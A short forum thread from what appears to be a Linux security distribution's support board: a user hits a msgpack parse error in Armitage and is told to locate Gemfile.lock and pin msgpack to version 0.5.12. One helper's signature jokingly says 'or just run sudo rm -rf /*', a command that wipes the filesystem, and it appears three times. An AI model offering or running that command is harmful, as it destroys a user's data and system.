[SOLVED] armitage parse error

Started by sckull, August 06, 2015, 09:26:02 AM

Previous topic - Next topic

sckull

I have this problem with armitage!

org.msgpack.Unpackexception: parse error

Please!

xxx600


sckull

Quote
this post here
https://forum.backbox.org/general-support/msfupdate-parse-error-for-armitage/msg9202/#msg9202

zerof plan Check solution in last topic:

https://github.com/rsmudge/armitage/issues/184

i can't understand this..

Edit Gemfile.lock with your favorite text editor where it says:
GEM
  remote: https://rubygems.org/
  specs:
msgpack (0.6.0)

To say:
msgpack (0.5.12)

ZEROF

Hi,

You will need to learn to be fine with find command and you will always find solution for situation like this:

sudo find / -name Gemfile.lock

"Edit Gemfile.lock with your favorite text editor where it says:"


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

ZEROF


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*

ZEROF

Fixed and armitage package updated!

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*